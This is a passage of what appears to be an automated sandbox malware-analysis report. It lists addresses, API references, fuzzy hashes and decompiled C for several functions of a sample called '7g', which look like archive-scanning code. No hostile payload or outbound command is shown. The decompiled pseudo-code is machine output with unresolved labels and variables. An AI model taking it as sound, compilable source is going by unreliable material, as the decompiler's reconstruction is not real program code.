                                                                                                                    0x00b33021
                                                                                                                    0x00b33024
                                                                                                                    0x00b33027
                                                                                                                    0x00b3302a
                                                                                                                    0x00b3302d
                                                                                                                    0x00b32fcc
                                                                                                                    0x00b32fd0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b32fd0
                                                                                                                    0x00b32dc5
                                                                                                                    0x00b32dc5
                                                                                                                    0x00b32dd6
                                                                                                                    0x00b32ddf
                                                                                                                    0x00b32de3
                                                                                                                    0x00b32de8
                                                                                                                    0x00b32df2
                                                                                                                    0x00b32dfe
                                                                                                                    0x00b32e04
                                                                                                                    0x00b32e07
                                                                                                                    0x00b32e0a
                                                                                                                    0x00b32e51
                                                                                                                    0x00b32e56
                                                                                                                    0x00b32e5c
                                                                                                                    0x00b32e5f
                                                                                                                    0x00b32e61
                                                                                                                    0x00b32e65
                                                                                                                    0x00b32e6e
                                                                                                                    0x00b32e6e
                                                                                                                    0x00b32e77
                                                                                                                    0x00b32e7e
                                                                                                                    0x00b32e81
                                                                                                                    0x00b32e8c
                                                                                                                    0x00b32e8c
                                                                                                                    0x00b32e8e
                                                                                                                    0x00b32e91
                                                                                                                    0x00b32f99
                                                                                                                    0x00b32f99
                                                                                                                    0x00b32f99
                                                                                                                    0x00000000
                                                                                                                    0x00b32e97
                                                                                                                    0x00b32ea4
                                                                                                                    0x00b32eaf
                                                                                                                    0x00b32eb6
                                                                                                                    0x00b32eba
                                                                                                                    0x00b32ec3
                                                                                                                    0x00b32ec8
                                                                                                                    0x00b32eca
                                                                                                                    0x00b32f33
                                                                                                                    0x00b32f36
                                                                                                                    0x00b32f3a
                                                                                                                    0x00b32f8c
                                                                                                                    0x00b32f8f
                                                                                                                    0x00b32f93
                                                                                                                    0x00000000
                                                                                                                    0x00b32f98
                                                                                                                    0x00b32f3f
                                                                                                                    0x00b32f43
                                                                                                                    0x00b32f4f
                                                                                                                    0x00b32f52
                                                                                                                    0x00b32f54
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b32f56
                                                                                                                    0x00b32f5b
                                                                                                                    0x00b32f5e
                                                                                                                    0x00b32f61
                                                                                                                    0x00b32f63
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b32f65
                                                                                                                    0x00b32f6b
                                                                                                                    0x00b32f6d
                                                                                                                    0x00b32f6f
                                                                                                                    0x00b32f74
                                                                                                                    0x00b32f82
                                                                                                                    0x00b32f84
                                                                                                                    0x00b32f86
                                                                                                                    0x00b33094
                                                                                                                    0x00b33097
                                                                                                                    0x00b3309f
                                                                                                                    0x00b330a4
                                                                                                                    0x00b330a9
                                                                                                                    0x00b330ad
                                                                                                                    0x00000000
                                                                                                                    0x00b330ad
                                                                                                                    0x00000000
                                                                                                                    0x00b32f86
                                                                                                                    0x00b32f67
                                                                                                                    0x00b32f69
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b32f69
                                                                                                                    0x00b32edb
                                                                                                                    0x00b32ede
                                                                                                                    0x00b32ee5
                                                                                                                    0x00b32ee7
                                                                                                                    0x00b32eea
                                                                                                                    0x00b32ef1
                                                                                                                    0x00b32ef4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b32f02
                                                                                                                    0x00b32f07
                                                                                                                    0x00b32f0b
                                                                                                                    0x00b32f0e
                                                                                                                    0x00b32f12
                                                                                                                    0x00b32f17
                                                                                                                    0x00b32f17
                                                                                                                    0x00b32f1a
                                                                                                                    0x00b32f1a
                                                                                                                    0x00000000
                                                                                                                    0x00b32f1a
                                                                                                                    0x00b32e91
                                                                                                                    0x00b32e0c
                                                                                                                    0x00b32e0e
                                                                                                                    0x00b32e13
                                                                                                                    0x00b32e16
                                                                                                                    0x00b32e18
                                                                                                                    0x00b32e1b
                                                                                                                    0x00b32e1e
                                                                                                                    0x00b32e24
                                                                                                                    0x00b32e24
                                                                                                                    0x00b32e2a
                                                                                                                    0x00b32e35
                                                                                                                    0x00b32e3a
                                                                                                                    0x00b32e3e
                                                                                                                    0x00b32e41
                                                                                                                    0x00b32e44
                                                                                                                    0x00b32e47
                                                                                                                    0x00000000
                                                                                                                    0x00b32e47
                                                                                                                    0x00b32d7d
                                                                                                                    0x00b32d43
                                                                                                                    0x00000000
                                                                                                                    0x00b32d43
                                                                                                                    0x00b32d27
                                                                                                                    0x00b32cc7
                                                                                                                    0x00b32cc7
                                                                                                                    0x00000000
                                                                                                                    0x00b32cc7

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B32B74
                                                                                                                      • Part of subcall function 00B2EFE3: __EH_prolog.LIBCMT ref: 00B2EFE8
                                                                                                                      • Part of subcall function 00B56B33: _CxxThrowException.MSVCRT(?,00B8FFC8), ref: 00B56B59
                                                                                                                      • Part of subcall function 00B36287: __EH_prolog.LIBCMT ref: 00B3628C
                                                                                                                      • Part of subcall function 00B3315C: __EH_prolog.LIBCMT ref: 00B33161
                                                                                                                      • Part of subcall function 00B3255B: __EH_prolog.LIBCMT ref: 00B32560
                                                                                                                      • Part of subcall function 00B3255B: strcmp.MSVCRT ref: 00B32614
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ExceptionThrowstrcmp
                                                                                                                    • String ID: Scanning error
                                                                                                                    • API String ID: 1140649431-2691707340
                                                                                                                    • Opcode ID: b860108f426416533700db4e308517130508c9795d9236c4ade2e11eae9e5341
                                                                                                                    • Instruction ID: d337f86e175174ea0ae50ec510a7282c6323267bcd472f3305a20472a6ed820b
                                                                                                                    • Opcode Fuzzy Hash: b860108f426416533700db4e308517130508c9795d9236c4ade2e11eae9e5341
                                                                                                                    • Instruction Fuzzy Hash: 01025971904259DFCF15DFA4C894AEEBBF0EF18310F2481E9E955AB252DB319E84CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B2A544 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 284COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E00B2A544(intOrPtr* __ecx, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t138;
				signed int* _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int _t160;
				signed int _t161;
				signed int* _t166;
				signed int _t171;
				void* _t172;
				intOrPtr _t177;
				signed int _t178;
				intOrPtr _t179;
				void* _t186;
				void* _t188;
				void* _t190;
				signed int _t195;
				signed int _t202;
				signed int _t211;
				signed int _t215;
				void* _t219;
				signed int _t221;
				signed int _t222;
				intOrPtr* _t228;
				signed int _t229;
				signed int _t231;
				void* _t232;
				void* _t265;

				_t265 = __fp0;
				L00B7F140(E00B84116, _t232);
				_t228 = __ecx;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				if( *(__ecx + 8) == 0) {
					 *(__ecx + 8) = 1;
				}
				_t214 =  *(_t228 + 4);
				_t186 = 7;
				_t138 = L00B7F400( *_t228, _t186, _t214);
				 *(_t232 - 0x24) = 0x40000000;
				if(_t214 > 0 || _t138 > 0x40000000) {
					_t188 = 0x1e;
					 *(_t232 - 0x1c) = L00B7F400(_t138, _t188, _t214);
					 *(_t232 - 0x18) = _t214;
				} else {
					 *(_t232 - 0x24) = _t138;
					 *(_t232 - 0x1c) = 1;
					 *(_t232 - 0x18) = 0;
				}
				_t221 =  *(_t228 + 8);
				 *((intOrPtr*)(_t232 - 0x84)) = 0;
				 *((intOrPtr*)(_t232 - 0x80)) = 0;
				if(_t221 > 1 ||  *((intOrPtr*)( *((intOrPtr*)(_t232 + 0xc)))) != 0) {
					 *(_t232 - 0x14) = 0;
					 *(_t232 - 0x10) = 0;
					 *(_t232 - 4) = 0;
					_push((_t221 << 5) + 4);
					_t143 = E00B11E55();
					 *(_t232 - 0x2c) = _t143;
					 *(_t232 - 4) = 1;
					if(_t143 == 0) {
						_t144 = 0;
						__eflags = 0;
					} else {
						_push(L00B29E5F);
						 *_t143 = _t221;
						 *(_t232 - 0x20) =  &(_t143[1]);
						L00B7F25A( &(_t143[1]), 0x20, _t221, E00B62544);
						_t144 =  *(_t232 - 0x20);
					}
					_t222 =  *(_t232 + 8);
					_t190 = 0;
					 *(_t232 - 4) = 0;
					 *(_t232 - 0x14) = _t144;
					if( *(_t228 + 8) <= 0) {
						L14:
						L00B279AA(_t232 - 0xb4, _t214, _t245);
						 *(_t232 + 8) = 0;
						if( *(_t228 + 8) <= 0) {
							L23:
							_t146 = E00B2A9ED(_t232 - 0x14);
							if(_t146 != 0) {
								L29:
								if(__eflags > 0) {
									_t146 = _t146 & 0x0000ffff | 0x80070000;
									__eflags = _t146;
								}
								_t229 = _t146;
								L33:
								 *(_t232 - 4) =  *(_t232 - 4) | 0xffffffff;
								E00B2AA2E(_t232 - 0x14);
								_t148 = _t229;
								goto L52;
							}
							_t195 =  *(_t228 + 8);
							 *(_t232 + 8) = 0;
							if(_t195 <= 0) {
								L28:
								 *(_t232 - 4) =  *(_t232 - 4) | 0xffffffff;
								E00B2AA2E(_t232 - 0x14);
								goto L41;
							}
							_t166 =  *(_t232 - 0x14) + 8;
							while(1) {
								_t214 =  *_t166;
								if(_t214 != 0) {
									break;
								}
								 *(_t232 + 8) =  *(_t232 + 8) + 1;
								_t166 =  &(_t166[8]);
								if( *(_t232 + 8) < _t195) {
									continue;
								}
								goto L28;
							}
							_t229 = _t214;
							goto L33;
						}
						 *((intOrPtr*)(_t232 - 0x28)) = 0;
						while(1) {
							_t205 =  *((intOrPtr*)(_t232 - 0x28)) +  *(_t232 - 0x14);
							_t168 =  *((intOrPtr*)(_t232 + 0xc));
							 *(_t232 - 0x20) =  *((intOrPtr*)(_t232 - 0x28)) +  *(_t232 - 0x14);
							if( *((intOrPtr*)( *((intOrPtr*)(_t232 + 0xc)))) == 0) {
								_t214 = E00B2A996;
								_t146 = E00B77E10(_t205, E00B2A996, _t205);
							} else {
								L00B27EB9(_t168,  *(_t232 + 8), _t232 - 0x2c);
								_t214 = E00B2A996;
								_t146 = L00B77E50( *(_t232 - 0x20), E00B2A996,  *(_t232 - 0x20),  *(_t232 - 0x2c));
							}
							if( *( *(_t232 - 0x20)) != 0) {
								 *(_t232 - 0x10) =  *(_t232 - 0x10) + 1;
							}
							if(_t146 != 0) {
								goto L29;
							}
							 *(_t232 + 8) =  *(_t232 + 8) + 1;
							 *((intOrPtr*)(_t232 - 0x28)) =  *((intOrPtr*)(_t232 - 0x28)) + 0x20;
							if( *(_t232 + 8) <  *(_t228 + 8)) {
								continue;
							}
							goto L23;
						}
						goto L29;
					} else {
						_t219 = 0;
						do {
							_t171 =  *(_t232 - 0x14);
							 *(_t171 + _t219 + 4) = _t222;
							_t172 = _t171 + _t219;
							_t190 = _t190 + 1;
							_t219 = _t219 + 0x20;
							 *(_t172 + 0x18) =  *(_t232 - 0x1c);
							 *(_t172 + 0x1c) =  *(_t232 - 0x18);
							 *((intOrPtr*)(_t172 + 8)) = 0;
							 *(_t172 + 0x10) =  *(_t232 - 0x24);
							_t245 = _t190 -  *(_t228 + 8);
							_t222 =  *(_t232 + 8);
						} while (_t190 <  *(_t228 + 8));
						goto L14;
					}
				} else {
					L00B279AA(_t232 - 0xb4, _t214, __eflags);
					_t177 =  *0xb9a464; // 0x1
					_t211 =  *(_t232 - 0x1c);
					_t222 =  *(_t232 + 8);
					 *((intOrPtr*)(_t232 + 0xc)) = _t177;
					_t178 =  *(_t232 - 0x18);
					 *(_t232 - 0x14) = _t211;
					__eflags = _t178;
					 *(_t232 - 0x10) = _t178;
					if(_t178 > 0) {
						goto L36;
						do {
							do {
								L36:
								_t214 =  *(_t232 - 0x24);
								_t179 = E00B2A87C( *((intOrPtr*)(_t232 + 0xc)),  *(_t232 - 0x24),  *0xb9a464);
								__eflags = _t222;
								 *((intOrPtr*)(_t232 + 0xc)) = _t179;
								if(_t222 == 0) {
									goto L38;
								}
								_t148 =  *((intOrPtr*)( *_t222 + 8))();
								__eflags = _t148;
								if(_t148 != 0) {
									L52:
									 *[fs:0x0] =  *((intOrPtr*)(_t232 - 0xc));
									return _t148;
								}
								L38:
								_t87 = _t232 - 0x14;
								 *_t87 =  *(_t232 - 0x14) + 0xffffffff;
								__eflags =  *_t87;
								asm("adc dword [ebp-0x10], 0xffffffff");
							} while ( *_t87 != 0);
							__eflags =  *(_t232 - 0x14);
						} while ( *(_t232 - 0x14) > 0);
						L40:
						_t91 = _t228 + 0x28;
						 *_t91 =  *(_t228 + 0x28) +  *((intOrPtr*)(_t232 + 0xc));
						__eflags =  *_t91;
						L41:
						if( *(_t228 + 0x28) != 0x12345678 || _t222 == 0) {
							L44:
							_push(_t232 - 0x64);
							 *(_t232 - 0x34) = 0;
							 *((intOrPtr*)(_t232 - 0x30)) = 0;
							L00B27A55(_t232 - 0xb4, _t214, _t259);
							_t215 =  *(_t228 + 8) *  *(_t232 - 0x24) >> 0x20;
							 *((intOrPtr*)(_t232 - 0x44)) = 0;
							 *((intOrPtr*)(_t232 - 0x40)) = 0;
							 *((intOrPtr*)(_t232 - 0x3c)) = 0;
							 *((intOrPtr*)(_t232 - 0x38)) = 0;
							 *(_t232 - 0x34) = 1;
							 *((intOrPtr*)(_t232 - 0x30)) = 0;
							 *(_t232 - 0x1c) = L00B27C89(_t232 - 0x64, L00B7F440(L00B7F440( *(_t228 + 8) *  *(_t232 - 0x24), _t215,  *(_t232 - 0x1c),  *(_t232 - 0x18)), _t215, 0x80, 0), _t215);
							 *(_t232 - 0x18) = _t215;
							 *(_t228 + 0x18) = L00B7F310(_t157, _t215,  *(_t228 + 8), 0);
							 *(_t228 + 0x1c) = _t215;
							 *((intOrPtr*)(_t228 + 0x20)) = L00B27B92(0, _t232 - 0x64, _t222, _t228, _t265);
							 *(_t228 + 0x24) = _t215;
							if(_t222 == 0) {
								L51:
								_t148 = 0;
								goto L52;
							}
							_t160 =  *((intOrPtr*)(_t228 + 0xc));
							 *(_t232 + 8) = _t160;
							if(_t160 == 0) {
								_t161 = 0;
								_t231 = 0;
								__eflags = 0;
							} else {
								_t161 =  *(_t228 + 0x10);
								_t202 =  *(_t228 + 0x14);
								_t262 = _t161 | _t202;
								if((_t161 | _t202) == 0) {
									_t161 =  *(_t228 + 0x18);
									_t231 =  *(_t228 + 0x1c);
								} else {
									_t231 = _t202;
								}
							}
							E00B2A1B2(0, _t222, _t232 - 0x64, _t222, _t231, _t262, _t265, 0,  *(_t232 - 0x1c),  *(_t232 - 0x18),  *(_t232 + 8), _t161, _t231, 0);
							_t148 =  *((intOrPtr*)( *_t222 + 8))();
							if(_t148 != 0) {
								goto L52;
							} else {
								goto L51;
							}
						} else {
							_t148 =  *((intOrPtr*)( *_t222 + 8))();
							_t259 = _t148;
							if(_t148 != 0) {
								goto L52;
							}
							goto L44;
						}
					}
					__eflags = _t211;
					if(_t211 <= 0) {
						goto L40;
					}
					goto L36;
				}
			}


































                                                                                                                    0x00b2a544
                                                                                                                    0x00b2a549
                                                                                                                    0x00b2a556
                                                                                                                    0x00b2a55e
                                                                                                                    0x00b2a561
                                                                                                                    0x00b2a564
                                                                                                                    0x00b2a567
                                                                                                                    0x00b2a56a
                                                                                                                    0x00b2a56d
                                                                                                                    0x00b2a56f
                                                                                                                    0x00b2a56f
                                                                                                                    0x00b2a578
                                                                                                                    0x00b2a57d
                                                                                                                    0x00b2a57e
                                                                                                                    0x00b2a58a
                                                                                                                    0x00b2a58d
                                                                                                                    0x00b2a595
                                                                                                                    0x00b2a59b
                                                                                                                    0x00b2a59e
                                                                                                                    0x00b2a5a3
                                                                                                                    0x00b2a5a3
                                                                                                                    0x00b2a5a6
                                                                                                                    0x00b2a5ad
                                                                                                                    0x00b2a5ad
                                                                                                                    0x00b2a5b0
                                                                                                                    0x00b2a5b3
                                                                                                                    0x00b2a5bc
                                                                                                                    0x00b2a5bf
                                                                                                                    0x00b2a5cc
                                                                                                                    0x00b2a5cf
                                                                                                                    0x00b2a5d4
                                                                                                                    0x00b2a5dd
                                                                                                                    0x00b2a5de
                                                                                                                    0x00b2a5e4
                                                                                                                    0x00b2a5e9
                                                                                                                    0x00b2a5ed
                                                                                                                    0x00b2a60f
                                                                                                                    0x00b2a60f
                                                                                                                    0x00b2a5ef
                                                                                                                    0x00b2a5ef
                                                                                                                    0x00b2a5f4
                                                                                                                    0x00b2a602
                                                                                                                    0x00b2a605
                                                                                                                    0x00b2a60a
                                                                                                                    0x00b2a60a
                                                                                                                    0x00b2a611
                                                                                                                    0x00b2a614
                                                                                                                    0x00b2a619
                                                                                                                    0x00b2a61c
                                                                                                                    0x00b2a61f
                                                                                                                    0x00b2a64d
                                                                                                                    0x00b2a653
                                                                                                                    0x00b2a65b
                                                                                                                    0x00b2a65e
                                                                                                                    0x00b2a6be
                                                                                                                    0x00b2a6c1
                                                                                                                    0x00b2a6c8
                                                                                                                    0x00b2a6fc
                                                                                                                    0x00b2a6fc
                                                                                                                    0x00b2a703
                                                                                                                    0x00b2a703
                                                                                                                    0x00b2a703
                                                                                                                    0x00b2a708
                                                                                                                    0x00b2a70e
                                                                                                                    0x00b2a70e
                                                                                                                    0x00b2a715
                                                                                                                    0x00b2a71a
                                                                                                                    0x00000000
                                                                                                                    0x00b2a71a
                                                                                                                    0x00b2a6ca
                                                                                                                    0x00b2a6cd
                                                                                                                    0x00b2a6d2
                                                                                                                    0x00b2a6eb
                                                                                                                    0x00b2a6eb
                                                                                                                    0x00b2a6f2
                                                                                                                    0x00000000
                                                                                                                    0x00b2a6f2
                                                                                                                    0x00b2a6d7
                                                                                                                    0x00b2a6da
                                                                                                                    0x00b2a6da
                                                                                                                    0x00b2a6de
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2a6e0
                                                                                                                    0x00b2a6e3
                                                                                                                    0x00b2a6e9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2a6e9
                                                                                                                    0x00b2a70c
                                                                                                                    0x00000000
                                                                                                                    0x00b2a70c
                                                                                                                    0x00b2a660
                                                                                                                    0x00b2a663
                                                                                                                    0x00b2a669
                                                                                                                    0x00b2a66b
                                                                                                                    0x00b2a66e
                                                                                                                    0x00b2a673
                                                                                                                    0x00b2a697
                                                                                                                    0x00b2a69c
                                                                                                                    0x00b2a675
                                                                                                                    0x00b2a67e
                                                                                                                    0x00b2a689
                                                                                                                    0x00b2a68f
                                                                                                                    0x00b2a68f
                                                                                                                    0x00b2a6a6
                                                                                                                    0x00b2a6a8
                                                                                                                    0x00b2a6a8
                                                                                                                    0x00b2a6ad
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2a6af
                                                                                                                    0x00b2a6b2
                                                                                                                    0x00b2a6bc
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2a6bc
                                                                                                                    0x00000000
                                                                                                                    0x00b2a621
                                                                                                                    0x00b2a621
                                                                                                                    0x00b2a623
                                                                                                                    0x00b2a623
                                                                                                                    0x00b2a626
                                                                                                                    0x00b2a62d
                                                                                                                    0x00b2a62f
                                                                                                                    0x00b2a630
                                                                                                                    0x00b2a633
                                                                                                                    0x00b2a639
                                                                                                                    0x00b2a63f
                                                                                                                    0x00b2a642
                                                                                                                    0x00b2a645
                                                                                                                    0x00b2a648
                                                                                                                    0x00b2a648
                                                                                                                    0x00000000
                                                                                                                    0x00b2a623
                                                                                                                    0x00b2a721
                                                                                                                    0x00b2a727
                                                                                                                    0x00b2a72c
                                                                                                                    0x00b2a731
                                                                                                                    0x00b2a734
                                                                                                                    0x00b2a737
                                                                                                                    0x00b2a73a
                                                                                                                    0x00b2a73d
                                                                                                                    0x00b2a740
                                                                                                                    0x00b2a742
                                                                                                                    0x00b2a745
                                                                                                                    0x00000000
                                                                                                                    0x00b2a74b
                                                                                                                    0x00b2a74b
                                                                                                                    0x00b2a74b
                                                                                                                    0x00b2a751
                                                                                                                    0x00b2a757
                                                                                                                    0x00b2a75c
                                                                                                                    0x00b2a75e
                                                                                                                    0x00b2a761
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2a767
                                                                                                                    0x00b2a76a
                                                                                                                    0x00b2a76c
                                                                                                                    0x00b2a86b
                                                                                                                    0x00b2a871
                                                                                                                    0x00b2a879
                                                                                                                    0x00b2a879
                                                                                                                    0x00b2a772
                                                                                                                    0x00b2a772
                                                                                                                    0x00b2a772
                                                                                                                    0x00b2a772
                                                                                                                    0x00b2a776
                                                                                                                    0x00b2a776
                                                                                                                    0x00b2a77c
                                                                                                                    0x00b2a77c
                                                                                                                    0x00b2a781
                                                                                                                    0x00b2a784
                                                                                                                    0x00b2a784
                                                                                                                    0x00b2a784
                                                                                                                    0x00b2a787
                                                                                                                    0x00b2a78e
                                                                                                                    0x00b2a7a3
                                                                                                                    0x00b2a7ac
                                                                                                                    0x00b2a7ad
                                                                                                                    0x00b2a7b0
                                                                                                                    0x00b2a7b3
                                                                                                                    0x00b2a7be
                                                                                                                    0x00b2a7c4
                                                                                                                    0x00b2a7c7
                                                                                                                    0x00b2a7ca
                                                                                                                    0x00b2a7cf
                                                                                                                    0x00b2a7d2
                                                                                                                    0x00b2a7d9
                                                                                                                    0x00b2a7f9
                                                                                                                    0x00b2a7ff
                                                                                                                    0x00b2a809
                                                                                                                    0x00b2a80f
                                                                                                                    0x00b2a817
                                                                                                                    0x00b2a81c
                                                                                                                    0x00b2a81f
                                                                                                                    0x00b2a869
                                                                                                                    0x00b2a869
                                                                                                                    0x00000000
                                                                                                                    0x00b2a869
                                                                                                                    0x00b2a821
                                                                                                                    0x00b2a826
                                                                                                                    0x00b2a829
                                                                                                                    0x00b2a843
                                                                                                                    0x00b2a845
                                                                                                                    0x00b2a845
                                                                                                                    0x00b2a82b
                                                                                                                    0x00b2a82b
                                                                                                                    0x00b2a82e
                                                                                                                    0x00b2a833
                                                                                                                    0x00b2a835
                                                                                                                    0x00b2a83b
                                                                                                                    0x00b2a83e
                                                                                                                    0x00b2a837
                                                                                                                    0x00b2a837
                                                                                                                    0x00b2a837
                                                                                                                    0x00b2a835
                                                                                                                    0x00b2a859
                                                                                                                    0x00b2a862
                                                                                                                    0x00b2a867
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2a794
                                                                                                                    0x00b2a798
                                                                                                                    0x00b2a79b
                                                                                                                    0x00b2a79d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2a79d
                                                                                                                    0x00b2a78e
                                                                                                                    0x00b2a747
                                                                                                                    0x00b2a749
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b2a749

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B2A549
                                                                                                                      • Part of subcall function 00B77E10: _beginthreadex.MSVCRT ref: 00B77E24
                                                                                                                    • __aulldiv.LIBCMT ref: 00B2A804
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog__aulldiv_beginthreadex
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2901374343-3916222277
                                                                                                                    • Opcode ID: 3a128f9c10f84b5a9408e6c46ddf0eced9361d23141813110571349343d2bbbb
                                                                                                                    • Instruction ID: 3cd6cb20a43fd37b1ecf270a7181a2168cc271a3beb7fbd81e69c31d86fe3142
                                                                                                                    • Opcode Fuzzy Hash: 3a128f9c10f84b5a9408e6c46ddf0eced9361d23141813110571349343d2bbbb
                                                                                                                    • Instruction Fuzzy Hash: 78B14BB1D00216DFCB24DF65D8809AEBBF1FF48310F2485AEE51AA7251D730AE81CB95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B38303 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 204COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E00B38303(void* __ecx, void* __eflags) {
				intOrPtr* _t108;
				signed int _t109;
				intOrPtr* _t112;
				signed int _t113;
				intOrPtr* _t116;
				signed int _t117;
				intOrPtr* _t119;
				signed int _t120;
				signed int _t124;
				signed int _t127;
				char* _t128;
				char* _t131;
				void* _t136;
				intOrPtr _t139;
				intOrPtr _t159;
				void* _t173;
				void* _t174;
				signed int _t177;
				void* _t178;
				intOrPtr* _t179;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t187;

				L00B7F140(0xb8520c, _t187);
				_t185 = __ecx;
				_t179 = __ecx + 0x50;
				 *((intOrPtr*)(__ecx + 0x58)) = 0;
				 *((char*)(__ecx + 0x60)) = 0;
				asm("sbb ecx, [ebp+0x10]");
				 *((intOrPtr*)(__ecx + 0x70)) =  *((intOrPtr*)(__ecx + 0x68)) -  *((intOrPtr*)(_t187 + 0xc));
				 *_t179 = 0;
				 *((intOrPtr*)(__ecx + 0x5c)) = 0;
				 *((intOrPtr*)(__ecx + 0x74)) =  *((intOrPtr*)(__ecx + 0x6c));
				 *((intOrPtr*)(_t179 + 4)) = 0;
				E00B382D7(__ecx + 0x78);
				 *(_t187 - 0x24) = 0;
				 *((short*)(_t187 - 0x22)) = 0;
				 *(_t187 - 0x1c) = 0;
				_t108 =  *((intOrPtr*)(_t187 + 8));
				 *(_t187 - 4) = 0;
				_t109 =  *((intOrPtr*)( *_t108 + 0x20))(_t108, 0x47, _t187 - 0x24, _t178, _t184, _t136);
				 *(_t187 - 0x10) = _t109;
				if(_t109 == 0) {
					 *((intOrPtr*)(__ecx + 0x7c)) = E00B38296(_t187 - 0x24, __ecx + 0x7b);
					L00B19312(_t187 - 0x24);
					 *(_t187 - 0x24) = 0;
					 *((short*)(_t187 - 0x22)) = 0;
					 *(_t187 - 0x1c) = 0;
					_t112 =  *((intOrPtr*)(_t187 + 8));
					 *(_t187 - 4) = 1;
					_t113 =  *((intOrPtr*)( *_t112 + 0x20))(_t112, 0x48, _t187 - 0x24);
					__eflags = _t113;
					 *(_t187 - 0x10) = _t113;
					if(_t113 == 0) {
						 *((intOrPtr*)(__ecx + 0x80)) = E00B38296(_t187 - 0x24, 0);
						L00B19312(_t187 - 0x24);
						 *(_t187 - 0x24) = 0;
						 *((short*)(_t187 - 0x22)) = 0;
						 *(_t187 - 0x1c) = 0;
						_t116 =  *((intOrPtr*)(_t187 + 8));
						 *(_t187 - 4) = 2;
						_t117 =  *((intOrPtr*)( *_t116 + 0x20))(_t116, 0x37, _t187 - 0x24);
						__eflags = _t117;
						 *(_t187 - 0x10) = _t117;
						if(_t117 == 0) {
							__eflags =  *(_t187 - 0x24);
							if( *(_t187 - 0x24) != 0) {
								__eflags =  *(_t187 - 0x24) - 8;
								_t131 =  *(_t187 - 0x1c);
								if( *(_t187 - 0x24) != 8) {
									_t131 = L"Unknown error";
								}
								L00B12F14(_t185 + 0x90, _t131);
							}
							L00B19312(_t187 - 0x24);
							 *(_t187 - 0x24) = 0;
							 *((short*)(_t187 - 0x22)) = 0;
							 *(_t187 - 0x1c) = 0;
							_t119 =  *((intOrPtr*)(_t187 + 8));
							 *(_t187 - 4) = 3;
							_t120 =  *((intOrPtr*)( *_t119 + 0x20))(_t119, 0x49, _t187 - 0x24);
							__eflags = _t120;
							 *(_t187 - 0x10) = _t120;
							if(_t120 == 0) {
								__eflags =  *(_t187 - 0x24);
								if( *(_t187 - 0x24) != 0) {
									__eflags =  *(_t187 - 0x24) - 8;
									_t128 =  *(_t187 - 0x1c);
									if( *(_t187 - 0x24) != 8) {
										_t128 = L"Unknown warning";
									}
									L00B12F14(_t185 + 0x9c, _t128);
								}
								 *(_t187 - 4) =  *(_t187 - 4) | 0xffffffff;
								L00B19312(_t187 - 0x24);
